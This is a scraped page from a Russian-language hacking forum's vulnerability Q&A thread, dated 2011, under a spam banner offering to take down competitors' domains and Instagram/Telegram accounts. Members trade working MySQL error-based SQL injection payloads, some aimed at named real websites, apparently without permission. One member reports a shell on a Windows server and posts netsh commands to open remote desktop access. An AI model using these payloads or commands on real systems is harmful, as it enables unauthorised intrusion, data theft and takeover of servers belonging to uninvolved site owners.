УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1812 из 2438

1812

Опции темы

Поиск в этой теме

Опции просмотра

#18111

15.09.2011, 21:23

Unknown

Guest

Сообщений: n/a

Провел на форуме:
42706

Репутация: 6

Пролез в бд но выдает все на непонятной кодировке..что можно сделать?

#18112

15.09.2011, 21:49

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от xa-xa89

xa-xa89 said:
А где-то подсмотреть результаты инсерта можно?
то почему бы просто не сделать вот так?
insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
ну и селект не из это же таблицы, помним)

способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся.

P.S.

попробовал

1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+'

уже лучше.

MYSQL ERROR:

Operand should contain 1 column(s)

Можно же вывести через duplicate column ?

P.P.S

все решилось

1'+and+(select*from(select+count(*)from(select+1+u nion+select+2+union+select+3)x+group+by+concat(mid ((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES +limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1

спасибо FlaktW

#18113

16.09.2011, 00:40

xa-xa89

Участник форума

Регистрация: 17.05.2008

Сообщений: 102

Провел на форуме:
1054394

Репутация: 74

Отправить сообщение для xa-xa89 с помощью ICQ

@попугай

если мы речь ведем про мускуль имеет место вот такое:

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')

insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1')

это так сказать в защиту моей теории

#18114

16.09.2011, 01:16

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от xa-xa89

xa-xa89 said:
@попугай
если мы речь ведем про мускуль имеет место вот такое:
insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1')
insert into TABLE (id, subid, date, data) values ('666', '
SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3
','1','1')
это так сказать в защиту моей теории

values ( скобкой не закрыта

#18115

16.09.2011, 21:29

sourcec0de

Guest

Сообщений: n/a

Провел на форуме:
10040

Репутация: 7

Цитата:

Сообщение от Kuteke

Kuteke said:
Помогите со скульей:

Код HTML:

HTML:
http://www.gasniergicquel.com/customer/home.php?cat=2

Код HTML:

HTML:
http://www.gasniergicquel.com/customer/help.php?section=presentation

Код:

Code:
http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const((select(concat_ws(0x3a,version(),user()))),1)),name_const((select(concat_ws(0x3a,version(),user()))),1))a)and'

#18116

17.09.2011, 06:10

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

sourcec0de, спасибо! Помоги и этим:

Код HTML:

HTML:
http://www.proximeety.gr/member-321531[sql].html

P.S. Сообщение не цитируйте, пожалуйста!

P.P.S. Модеры, не удаляйте это сообщение!

#18117

17.09.2011, 10:54

GroM88

Познающий

Регистрация: 25.10.2007

Сообщений: 46

Провел на форуме:
318186

Репутация: 2

Отправить сообщение для GroM88 с помощью ICQ

Помогите скуль крутануть. Бред, не получается нихера = \

_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683

#18118

17.09.2011, 11:36

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от GroM88

GroM88 said:
Помогите скуль крутануть. Бред, не получается нихера = \
_http://cs.hz.by/bans/ban_details_ex.php?bhid=16683

Там нету скули. Пропускаются только цифровые значения.

Цитата:

Сообщение от Kuteke

Kuteke said:
http://www.proximeety.gr/member-321531[sql].html
P.S. Сообщение не цитируйте, пожалуйста!
P.P.S. Модеры, не удаляйте это сообщение!

Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.

#18119

17.09.2011, 20:09

Ulitko

Guest

Сообщений: n/a

Провел на форуме:
4389

Репутация: 0

Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается(

вот код запуска, мб я что-то напутал?

Код:

Code:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

#18120

17.09.2011, 20:40

xa-xa89

Участник форума

Регистрация: 17.05.2008

Сообщений: 102

Провел на форуме:
1054394

Репутация: 74

а по моему это все делается через net start

Страница 1812 из 2438

1812

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход